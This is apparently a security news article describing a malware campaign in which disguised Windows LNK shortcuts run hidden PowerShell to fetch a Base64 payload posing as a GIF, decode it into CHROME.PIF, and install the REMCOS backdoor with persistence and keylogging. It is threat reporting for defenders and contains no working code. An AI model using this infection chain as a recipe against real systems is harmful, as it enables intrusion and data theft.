A recent malware attack is utilizing LNK files to deploy the REMCOS backdoor on Windows systems.

In recent weeks, cybersecurity teams have detected a rise in malicious campaigns that exploit Windows shortcut (LNK) files to deploy sophisticated backdoors. These attacks cleverly disguise LNK shortcuts as harmless documents or folders, taking advantage of Windows’ default setting that hides known file extensions to mislead users. When executed, the shortcut silently invokes PowerShell with hidden window parameters, which fetches and decodes a Base64 payload that ultimately installs the REMCOS backdoor. The stealthy execution of this chain—utilising social engineering, fileless scripting, and living-off-the-land binaries—highlights the evolving tactics of threat actors targeting enterprise environments. Analysts from Point Wild have observed that the initial delivery often occurs through phishing emails, with attachments labelled as invoices or shipping documents. In some instances, threat actors embed these malicious shortcuts within ZIP or RAR archives on network shares, relying on casual browsing to trigger execution.

The infection mechanism relies on exploiting LNK file properties to load malicious commands without raising user suspicion. Unlike Office macros, LNK files do not trigger macro security warnings, allowing for seamless execution. Upon double-clicking the LNK file, it silently launches powershell.exe with hidden parameters, directing the victim’s machine to download an obfuscated payload from a remote server. Point Wild researchers have identified that the downloaded file masquerades as a .GIF extension but contains Base64-encoded binary data. This multi-stage infection workflow involves an embedded PowerShell script that retrieves an encoded text resource, writes it to C:ProgramDataHEW.GIF, decodes it into a Windows PIF file named CHROME.PIF, and then executes this binary. The PIF file, disguised as a Chrome-themed program, exploits legacy support for MS-DOS shortcuts to bypass modern security warnings. Once launched, it drops additional artifacts, including a scheduled task shortcut and a URL file, to ensure persistence and facilitate further payload execution. The REMCOS backdoor grants attackers full remote control over compromised hosts, enabling arbitrary shell command execution, file transfer, keylogging, and even webcam capture. Victims often remain unaware of the breach, as the malware stores keystroke logs in C:ProgramDataremcoslogs.dat and establishes encrypted channels with command-and-control servers located in Eastern Europe. The combination of stealthy execution and robust remote capabilities poses a significant risk to corporate networks, where lateral movement and data exfiltration can follow the initial compromise.